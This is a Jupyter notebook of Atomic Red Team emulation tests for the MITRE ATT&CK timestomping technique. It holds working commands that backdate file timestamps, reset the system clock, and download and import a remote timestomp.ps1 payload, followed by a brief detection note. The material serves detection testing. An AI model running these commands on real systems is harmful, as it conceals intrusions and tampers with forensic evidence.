{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1070.006 - Indicator Removal on Host: Timestomp",
    "\n",
    "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - Set a file's access timestamp\nStomps on the access timestamp of a file\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `sh`\n```sh\ntouch -a -t 197001010000.00 /opt/filename\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - Set a file's modification timestamp\nStomps on the modification timestamp of a file\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `sh`\n```sh\ntouch -m -t 197001010000.00 /opt/filename\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - Set a file's creation timestamp\nStomps on the create timestamp of a file\n\nSetting the creation timestamp requires changing the system clock and reverting.\nSudo or root privileges are required to change date. Use with caution.\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `sh`\n```sh\nNOW=$(date)\ndate -s \"1970-01-01 00:00:00\"\ntouch /opt/filename\ndate -s \"$NOW\"\nstat /opt/filename\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #4 - Modify file timestamps using reference file\nModifies the `modify` and `access` timestamps using the timestamps of a specified reference file.\n\nThis technique was used by the threat actor Rocke during the compromise of Linux web servers.\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `sh`\n```sh\ntouch -acmr /bin/sh /opt/filename\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 4"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell\nModifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: A file must exist at the path (#{file_path}) to change the creation time on\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path $env:TEMP\\T1551.006_timestomp.txt) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Path $env:TEMP\\T1551.006_timestomp.txt -Force | Out-Null\nSet-Content $env:TEMP\\T1551.006_timestomp.txt -Value \"T1551.006 Timestomp\" -Force | Out-Null\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 5 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `powershell`\n```powershell\nGet-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.CreationTime = \"01/01/1970 00:00:00\" }\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell\nModifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: A file must exist at the path (#{file_path}) to change the modified time on\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path $env:TEMP\\T1551.006_timestomp.txt) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Path $env:TEMP\\T1551.006_timestomp.txt -Force | Out-Null\nSet-Content $env:TEMP\\T1551.006_timestomp.txt -Value \"T1551.006 Timestomp\" -Force | Out-Null\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 6 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `powershell`\n```powershell\nGet-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastWriteTime = \"01/01/1970 00:00:00\" }\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 6"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell\nModifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: A file must exist at the path (#{file_path}) to change the last access time on\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path $env:TEMP\\T1551.006_timestomp.txt) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Path $env:TEMP\\T1551.006_timestomp.txt -Force | Out-Null\nSet-Content $env:TEMP\\T1551.006_timestomp.txt -Value \"T1551.006 Timestomp\" -Force | Out-Null\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 7 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `powershell`\n```powershell\nGet-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastAccessTime = \"01/01/1970 00:00:00\" }\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 7"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #8 - Windows - Timestomp a File\nTimestomp kxwn.lock.\n\nSuccessful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. \n\n[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: timestomp.ps1 must be present in #{file_path}.\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path $env:appdata\\Microsoft\\timestomp.ps1) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nInvoke-WebRequest \"https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1\" -OutFile \"$env:appdata\\Microsoft\\timestomp.ps1\"\n\n```\n##### Description: kxwn.lock must be present in #{file_path}.\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path -path \"$env:appdata\\Microsoft\\kxwn.lock\") {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Path $env:appdata\\Microsoft\\kxwn.lock -ItemType File\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 8 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `powershell`\n```powershell\nimport-module $env:appdata\\Microsoft\\timestomp.ps1\ntimestomp -dest \"$env:appdata\\Microsoft\\kxwn.lock\"\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1070.006 -TestNumbers 8"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}